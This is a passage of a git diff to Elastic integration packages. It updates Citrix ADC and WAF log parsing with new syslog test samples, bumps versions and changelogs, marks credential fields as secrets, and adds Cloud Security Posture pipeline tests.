"f9e0bb83-7c80-4abb-8a68-5be15c8f096b:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f9e0bb83-7c80-4abb-8a68-5be15c8f096b:90bfe744-969a-453e-af29-e3ef2dd9cc25", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71:indexpattern-datasource-layer-e2506703-c355-4307-9b8c-623fa77c78a6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6c5b6057-a76c-4a86-9ae5-5648e38c7b71:fe0867c1-6ca2-4dac-88ce-6f1b36a9d1bf", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2:indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4c8a3f96-6e7a-4bdb-acbe-f52e4f7dc6b2:9e48fe6b-c833-4cf4-82cc-8323783d52e1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7fd7a318-184d-4c0c-b0ee-b8958117a04a:indexpattern-datasource-layer-771a3ae6-3454-44c5-8386-30e43d147b04", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7fd7a318-184d-4c0c-b0ee-b8958117a04a:f2fd7484-cb11-4fe0-947b-a5c3e845e677", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b1a20813-82f1-4ba0-b295-695020f85209:indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b1a20813-82f1-4ba0-b295-695020f85209:f1141519-608f-4767-96cc-24e8842474ca", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a2059241-c442-45ca-a3f9-9155480ec367:indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a2059241-c442-45ca-a3f9-9155480ec367:9e133606-638d-42c5-a4ef-01ec82c06598", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78:indexpattern-datasource-layer-1d85203e-e619-44d1-99eb-1890f1a7c084", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2df4dd1c-9b9c-411a-9aed-c37b6a535b78:cf79bd3f-262a-4663-8fff-63b00b87c34b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "87d8f4ae-bff3-4541-93f6-5f0495b22354:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "87d8f4ae-bff3-4541-93f6-5f0495b22354:813eba55-180f-41d5-9693-3bb4cbaa5b93", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6362ec71-d94c-40ae-a3b0-6fd99a74f3fa:0000c5e7-f881-4b37-84b1-5f87b3c39298", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "04dd2a49-ecb6-4a37-9ed1-ff4cb32e7315:c67b80ce-454e-4e6c-b76d-1b09a8fe8736", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6a0db5d9-5c35-4822-8be4-ba29d9e4a414:03db2a39-f594-4c99-9a96-4d0ea0803a78", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7:indexpattern-datasource-layer-c9ccb6a3-5949-4684-ba32-c58cd71c456f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6339da61-ce3d-40ff-b7dc-4d5525f5ccf7:6cf95b00-4a04-4ca9-94f4-877e91791676", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e89299e1-4cd9-49ef-89e8-3864d1224469:indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e89299e1-4cd9-49ef-89e8-3864d1224469:244824be-e6fc-4121-8159-e2a4e11c0a2a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f:indexpattern-datasource-layer-56ec7bd9-8eff-4c45-86fb-96ff48db7730", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d9220f99-2e6e-4c43-b55a-54cb8b3cb55f:8e92059b-9b18-4b02-b102-bef8a1787d78", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a02365ac-b2de-4f1c-a59f-ec763f0634e7:indexpattern-datasource-layer-1d2c9c58-fe87-46cd-943e-90fb37a18c6e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a02365ac-b2de-4f1c-a59f-ec763f0634e7:1d0d4d94-f9bb-4246-aa05-c02d3a7d23ec", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d5ccace-9260-4464-af7c-6165af68480e:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8d5ccace-9260-4464-af7c-6165af68480e:baa1a399-bb78-458e-a95e-da29abcb3374", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5c252e5-add3-46e7-9d63-133881e24666:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c5c252e5-add3-46e7-9d63-133881e24666:6cab624e-160d-43ec-8f70-e80787f5d46b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c6e8140c-ab76-433a-9309-8bdb471ae311:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c6e8140c-ab76-433a-9309-8bdb471ae311:4a5fe18d-b8d0-45d1-9937-9bfe329f4c85", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2:indexpattern-datasource-layer-35179640-438c-41c3-a0c9-1eb27a1929d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "26ab28ea-2f8d-4612-92ed-0bc9cf0f56c2:d8c7fbbb-d7dc-4b07-99ca-c30b4334fdf6", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "164d7357-8f59-4773-a775-fe7faee555de:layer_1_join_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "164d7357-8f59-4773-a775-fe7faee555de:layer_2_join_0_index_pattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6ab2c79f-26b6-40d8-b815-11f62306ce5b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_7849d87b-cbf3-47c3-b808-135dbf36be2b:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6351864e-e4f7-4e0e-87be-cfbadfc617e5:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_65ecce3a-f292-4786-bbe8-5d9a0964a5ce:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard" +} \ No newline at end of file diff --git a/packages/citrix_adc/manifest.yml b/packages/citrix_adc/manifest.yml index a5a9914dd6e..34ca396f65c 100644 --- a/packages/citrix_adc/manifest.yml +++ b/packages/citrix_adc/manifest.yml @@ -1,15 +1,15 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: citrix_adc title: Citrix ADC -version: "1.2.0" -description: This Elastic integration collects metrics from Citrix ADC product. +version: "1.5.1" +description: This Elastic integration collects logs and metrics from Citrix ADC product. type: integration categories: - observability - network conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic icons: @@ -42,6 +42,10 @@ screenshots: title: Citrix ADC VPN dashboard size: 600x600 type: image/png + - src: /img/citrix_adc-log-dashboard.png + title: Citrix ADC Overview + size: 3352x3206 + type: image/png policy_templates: - name: Citrix ADC title: Citrix ADC metrics @@ -76,6 +80,7 @@ policy_templates: - name: password type: password title: Password + secret: true show_user: true required: false default: nsroot @@ -109,6 +114,15 @@ policy_templates: # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk # sxSmbIUfc2SGJGCJD4I= # -----END CERTIFICATE----- + - type: tcp + title: Collect logs from Citrix ADC via TCP + description: Collecting logs from Citrix ADC via TCP + - type: udp + title: Collect logs from Citrix ADC via UDP + description: Collecting logs from Citrix ADC via UDP + - type: logfile + title: Collect logs from Citrix ADC via file + description: Collecting logs from Citrix ADC via file owner: github: elastic/obs-infraobs-integrations type: elastic diff --git a/packages/citrix_waf/changelog.yml b/packages/citrix_waf/changelog.yml index ece34abb250..826d91d554b 100644 --- a/packages/citrix_waf/changelog.yml +++ b/packages/citrix_waf/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.15.0" + changes: + - description: Relax message header parsing constraints. + type: enhancement + link: https://github.com/elastic/integrations/pull/9285 +- version: "1.14.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.13.2" changes: - description: Changed owners diff --git a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log index b5ea35e8088..c5ce92b6c9d 100644 --- a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log +++ b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log @@ -3,4 +3,8 @@ Jun 22 19:14:37 81.2.69.144 12/04/2017:17:21:00 GMT citrix.netscal Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : TCP CONN_DELINK 4471 0 : Source 192.168.10.10:52187 - Vserver 81.2.69.144:80 - NatIP 192.168.10.10:52187 - Destination 81.2.69.144:80 - Delink Time 10/06/2014:14:03:23 GMT - Total_bytes_send 1075 - Total_bytes_recv 352 Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4472 0 : Source 192.168.10.35:80 - Destination 192.168.10.51:35341 - Start Time 10/06/2014:14:02:43 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4473 0 : Source 127.0.0.1:7776 - Destination 127.0.0.2:55623 - Start Time 10/06/2014:14:02:45 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 -Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 \ No newline at end of file +Oct 6 14:03:30 81.2.69.144 10/06/2014:14:03:30 GMT ns1 0-PPE-0 : TCP CONN_TERMINATE 4474 0 : Source 127.0.0.1:80 - Destination 127.0.0.2:39771 - Start Time 10/06/2014:14:02:46 GMT - End Time 10/06/2014:14:03:30 GMT - Total_bytes_send 1 - Total_bytes_recv 1 +<134> 2024/03/04:17:59:39 GMT 0-PPE-1 : default API CMD_EXECUTED 149531 0 : User - ADM_User NONE - Remote_ip - Command "logout" - Status "Success" +<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490029 0 : "Authentication is rejected for sshah (client ip : 81.2.69.144 , vserver ip: 192.168.10.10 ), extended error, if any : " +<133> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490026 0 : "sslvpn_aaad_login_handler : (0-125662): sslvpn_aaad_login_handler: Reply Received, status from aaad: 3, aaad flags 1000" +<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490023 0 : "ns_aaa_login_handler : X509 cert not found " diff --git a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json index a12dbb91edd..1193674d702 100644 --- a/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json +++ b/packages/citrix_waf/data_stream/log/_dev/test/pipeline/test-citrix-waf-native.log-expected.json @@ -228,6 +228,93 @@ "severity": 0, "timezone": "GMT" } + }, + { + "@timestamp": "2024-03-04T17:59:39.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "<134> 2024/03/04:17:59:39 GMT 0-PPE-1 : default API CMD_EXECUTED 149531 0 : User - ADM_User NONE - Remote_ip - Command \"logout\" - Status \"Success\"", + "device_event_class_id": "API", + "extended": { + "message": "User - ADM_User NONE - Remote_ip - Command \"logout\" - Status \"Success\"" + }, + "name": "CMD_EXECUTED" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "149531", + "severity": 0, + "timezone": "GMT" + } + }, + { + "@timestamp": "2024-03-06T21:02:04.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490029 0 : \"Authentication is rejected for sshah (client ip : 81.2.69.144 , vserver ip: 192.168.10.10 ), extended error, if any : \"", + "device_event_class_id": "AAA", + "extended": { + "message": "Authentication is rejected for sshah (client ip : 81.2.69.144 , vserver ip: 192.168.10.10 ), extended error, if any : " + }, + "host": "host1", + "name": "Message" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "490029", + "severity": 0, + "timezone": "GMT" + } + }, + { + "@timestamp": "2024-03-06T21:02:04.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "<133> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490026 0 : \"sslvpn_aaad_login_handler : (0-125662): sslvpn_aaad_login_handler: Reply Received, status from aaad: 3, aaad flags 1000\"", + "device_event_class_id": "AAA", + "extended": { + "message": "sslvpn_aaad_login_handler : (0-125662): sslvpn_aaad_login_handler: Reply Received, status from aaad: 3, aaad flags 1000" + }, + "host": "host1", + "name": "Message" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "490026", + "severity": 0, + "timezone": "GMT" + } + }, + { + "@timestamp": "2024-03-06T21:02:04.000Z", + "citrix": { + "cef_format": false, + "default_class": true, + "detail": "<134> 2024/03/06:21:02:04 GMT host1 0-PPE-0 : default AAA Message 490023 0 : \"ns_aaa_login_handler : X509 cert not found \"", + "device_event_class_id": "AAA", + "extended": { + "message": "ns_aaa_login_handler : X509 cert not found " + }, + "host": "host1", + "name": "Message" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "490023", + "severity": 0, + "timezone": "GMT" + } } ] } \ No newline at end of file diff --git a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a39948879c8..7f0e7b6ca42 100644 --- a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -14,6 +14,7 @@ processors: field: event.original patterns: - '^%{SYSLOG_TIMESTAMP} %{LEVEL} %{IP:client.ip:ip} %{GREEDYDATA:citrix.detail}' + - '^%{GREEDYDATA:citrix.detail}' pattern_definitions: LEVEL: '?' IDENT: '[a-zA-Z][a-zA-Z0-9]*' @@ -69,6 +70,7 @@ processors: field: _tmp.timestamp_native formats: - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss timezone: '{{{event.timezone}}}' - remove: field: citrix.event_year diff --git a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml index a4776f5ae3e..bb3d845f58c 100644 --- a/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml +++ b/packages/citrix_waf/data_stream/log/elasticsearch/ingest_pipeline/native.yml @@ -8,10 +8,11 @@ processors: description: Extract native header and message. field: citrix.detail patterns: + - '^%{HEADER} : %{GREEDYDATA:_tmp.details} : +"%{GREEDYDATA:citrix.extended.message}"' - '^%{HEADER} : %{GREEDYDATA:_tmp.details} : +%{GREEDYDATA:citrix.extended.message}' pattern_definitions: - HEADER: '%{NATIVE_TIMESTAMP:_tmp.timestamp_native} %{WORD:event.timezone} %{SYSLOGHOST:citrix.host} %{INT}-PPE-%{INT}' - NATIVE_TIMESTAMP: '%{MONTHNUM}/%{MONTHDAY}/%{YEAR}:%{HOUR}:%{MINUTE}:%{SECOND}' + HEADER: '(?:<%{NUMBER}>%{SPACE})?%{NATIVE_TIMESTAMP:_tmp.timestamp_native} %{WORD:event.timezone} (?:%{SYSLOGHOST:citrix.host} )?%{INT}-PPE-%{INT}' + NATIVE_TIMESTAMP: '(?:%{MONTHNUM}/%{MONTHDAY}/%{YEAR}|%{YEAR}/%{MONTHNUM}/%{MONTHDAY}):%{HOUR}:%{MINUTE}:%{SECOND}' - grok: description: Parse out details. field: _tmp.details diff --git a/packages/citrix_waf/manifest.yml b/packages/citrix_waf/manifest.yml index 2cd5661fe9a..c7984af148b 100644 --- a/packages/citrix_waf/manifest.yml +++ b/packages/citrix_waf/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: citrix_waf title: "Citrix Web App Firewall" -version: "1.13.2" +version: "1.15.0" description: Ingest events from Citrix Systems Web App Firewall. type: integration categories: diff --git a/packages/cloud_defend/changelog.yml b/packages/cloud_defend/changelog.yml index c3efcccded3..c3e28d122d1 100644 --- a/packages/cloud_defend/changelog.yml +++ b/packages/cloud_defend/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.2.5" + changes: + - description: Update integration support matrix + type: enhancement + link: https://github.com/elastic/integrations/pull/9441 +- version: "1.2.4" + changes: + - description: Fix integration subscription tier + type: enhancement + link: https://github.com/elastic/integrations/pull/9416 - version: "1.2.3" changes: - description: Changed owners diff --git a/packages/cloud_defend/docs/README.md b/packages/cloud_defend/docs/README.md index 7534b6a6019..9708be5e96e 100644 --- a/packages/cloud_defend/docs/README.md +++ b/packages/cloud_defend/docs/README.md @@ -412,7 +412,7 @@ The following fields are populated for all events where `event.category: file` # Support matrix -|   | EKS 1.24-1.26 (AL2022) | GKE 1.24-1.26 (COS) | +|   | EKS 1.24-1.27 (AL2022) | GKE 1.24-1.27 (COS) | | -- | -- | -- | | Process event exports | ✅ | ✅ | | File event exports | ✅ | ✅ | diff --git a/packages/cloud_defend/manifest.yml b/packages/cloud_defend/manifest.yml index 0c80a97b427..c23c7bba4fa 100644 --- a/packages/cloud_defend/manifest.yml +++ b/packages/cloud_defend/manifest.yml @@ -1,7 +1,7 @@ format_version: 3.0.0 name: cloud_defend title: "Defend for Containers" -version: 1.2.3 +version: 1.2.5 source: license: "Elastic-2.0" description: "Elastic Defend for Containers (BETA) provides cloud-native runtime protections for containerized environments." @@ -14,6 +14,7 @@ conditions: kibana: version: ^8.11.0 elastic: + subscription: enterprise capabilities: - security screenshots: diff --git a/packages/cloud_security_posture/changelog.yml b/packages/cloud_security_posture/changelog.yml index 0d1cc37f062..795d75d3942 100644 --- a/packages/cloud_security_posture/changelog.yml +++ b/packages/cloud_security_posture/changelog.yml @@ -1,5 +1,6 @@ # newer versions go on top # version map: +# 1.9.x - 8.14.x # 1.8.x - 8.13.x # 1.7.x - 8.12.x # 1.6.x - 8.11.x @@ -7,8 +8,32 @@ # 1.4.x - 8.9.x # 1.3.x - 8.8.x # 1.2.x - 8.7.x -- version: "1.8.0-preview05" +- version: "1.9.0-preview03" changes: + - description: Update findings ingest pipeline to remove empty cloud.account.id and cloud.account.name + type: enhancement + link: https://github.com/elastic/integrations/pull/9470 +- version: "1.9.0-preview02" + changes: + - description: Fix cluster_id missing error in the Ingest Pipeline + type: bugfix + link: https://github.com/elastic/integrations/pull/9434 +- version: "1.9.0-preview01" + changes: + - description: Convert fields to secrets + type: enhancement + link: https://github.com/elastic/integrations/pull/9331 +- version: "1.8.0" + changes: + - description: Bump up version + type: enhancement + link: https://github.com/elastic/integrations/pull/9331 + - description: Add cloudsecurity_cdr sub category label. + type: enhancement + link: https://github.com/elastic/integrations/pull/9213 + - description: Add missing CIS Azure rule templates + type: enhancement + link: https://github.com/elastic/integrations/pull/9211 - description: Rollback CIS Azure Rules 9.3,9.10 type: bugfix link: https://github.com/elastic/integrations/pull/8799 @@ -24,6 +49,9 @@ - description: Adopt Secrets type: enhancement link: https://github.com/elastic/integrations/pull/8665 + - description: Bump version + type: enhancement + link: https://github.com/elastic/integrations/pull/9168 - version: "1.7.1" changes: - description: Remove disabled fields. diff --git a/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json new file mode 100644 index 00000000000..9615905bfc6 --- /dev/null +++ b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json @@ -0,0 +1,116 @@ +{ + "events": [ + { + "rule": { + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "rule_number": "1.23", + "id": "cis_azure", + "version": "v2.0.0", + "posture_type": "cspm" + } + }, + "cloud": { + "provider": "azure", + "account": { + "id": "", + "name": "" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "rule_number": "1.23", + "id": "cis_azure", + "version": "v2.0.0", + "posture_type": "cspm" + } + }, + "cloud": { + "provider": "azure", + "account": { + "id": "test", + "name": "" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Microsoft Azure Foundations", + "rule_number": "1.23", + "id": "cis_azure", + "version": "v2.0.0", + "posture_type": "cspm" + } + }, + "cloud": { + "provider": "azure", + "account": { + "id": "test-2", + "name": "test 2" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1", + "posture_type": "kspm" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "cluster_id": "cluster_test_1", + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1", + "posture_type": "kspm" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + }, + { + "cluster_id": "cluster_test_1", + "orchestrator": { + "cluster": { + "name": "cluster_test", + "id": "cluster_test" + } + }, + "rule": { + "benchmark": { + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "rule_number": "3.2.5", + "id": "cis_eks", + "version": "v1.0.1", + "posture_type": "kspm" + } + }, + "@timestamp": "2024-04-04T16:32:27.398Z" + } + ] +} diff --git a/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json-expected.json b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json-expected.json new file mode 100644 index 00000000000..bb1fa5193fd --- /dev/null +++ b/packages/cloud_security_posture/data_stream/findings/_dev/test/pipeline/test-findings-log.json-expected.json @@ -0,0 +1,139 @@ +{ + "expected": [ + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cloud": { + "account": {}, + "provider": "azure" + }, + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_azure", + "name": "CIS Microsoft Azure Foundations", + "posture_type": "cspm", + "rule_number": "1.23", + "version": "v2.0.0" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cloud": { + "account": { + "id": "test" + }, + "provider": "azure" + }, + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_azure", + "name": "CIS Microsoft Azure Foundations", + "posture_type": "cspm", + "rule_number": "1.23", + "version": "v2.0.0" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cloud": { + "account": { + "id": "test-2", + "name": "test 2" + }, + "provider": "azure" + }, + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_azure", + "name": "CIS Microsoft Azure Foundations", + "posture_type": "cspm", + "rule_number": "1.23", + "version": "v2.0.0" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "ecs": { + "version": "8.6.0" + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cluster_id": "cluster_test_1", + "ecs": { + "version": "8.6.0" + }, + "orchestrator": { + "cluster": { + "id": "cluster_test_1" + } + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + }, + { + "@timestamp": "2024-04-04T16:32:27.398Z", + "cluster_id": "cluster_test_1", + "ecs": { + "version": "8.6.0" + }, + "orchestrator": { + "cluster": { + "id": "cluster_test", + "name": "cluster_test" + } + }, + "rule": { + "benchmark": { + "id": "cis_eks", + "name": "CIS Amazon Elastic Kubernetes Service (EKS)", + "posture_type": "kspm", + "rule_number": "3.2.5", + "version": "v1.0.1" + } + } + } + ] +} \ No newline at end of file diff --git a/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml b/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml index 71da37a8f5f..3ee866d43a4 100644 --- a/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cloud_security_posture/data_stream/findings/elasticsearch/ingest_pipeline/default.yml @@ -13,7 +13,18 @@ processors: field: orchestrator.cluster.id copy_from: cluster_id description: 'Backward compatibility cloudbeat version < 8.8' + ignore_empty_value: true if: ctx.orchestrator?.cluster?.id == null +- remove: + field: cloud.account.id + ignore_missing: true + description: 'Removes cloud.account.id when it is empty' + if: ctx.cloud?.account?.id == '' +- remove: + field: cloud.account.name + ignore_missing: true + description: 'Removes cloud.account.name when it is empty' + if: ctx.cloud?.account?.name == '' on_failure: - set: field: event.kind diff --git a/packages/cloud_security_posture/data_stream/findings/manifest.yml b/packages/cloud_security_posture/data_stream/findings/manifest.yml index b517accf1c0..5c54cde3146 100644 --- a/packages/cloud_security_posture/data_stream/findings/manifest.yml +++ b/packages/cloud_security_posture/data_stream/findings/manifest.yml @@ -31,7 +31,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: session_token type: text title: Session Token @@ -81,7 +81,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: session_token type: text title: Session Token @@ -161,6 +161,7 @@ streams: multi: false required: false show_user: true + secret: true - input: cloudbeat/cis_azure title: CIS Azure Benchmark description: CIS Benchmark for Microsoft Azure Foundations @@ -197,7 +198,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: azure.credentials.client_username type: text title: Client Username @@ -210,7 +211,7 @@ streams: multi: false required: false show_user: true - secret: false + secret: true - name: azure.credentials.client_certificate_path type: text title: Client Certificate Path @@ -223,4 +224,4 @@ streams: multi: false required: false show_user: true - secret: false + secret: true diff --git a/packages/cloud_security_posture/kibana/csp_rule_template/01629238-aea8-5737-a59b-45baf8dab404.json b/packages/cloud_security_posture/kibana/csp_rule_template/01629238-aea8-5737-a59b-45baf8dab404.json new file mode 100644 index 00000000000..cf707ba4268 --- /dev/null +++ b/packages/cloud_security_posture/kibana/csp_rule_template/01629238-aea8-5737-a59b-45baf8dab404.json @@ -0,0 +1,38 @@ +{ + "id": "01629238-aea8-5737-a59b-45baf8dab404", + "type": "csp-rule-template", + "attributes": { + "metadata": { + "impact": "**NOTE:** You must have your key vault setup to utilize this.\nAll Audit Logs will be encrypted with a key you provide. You will need to set up customer managed keys separately, and you will select which key to use via the instructions 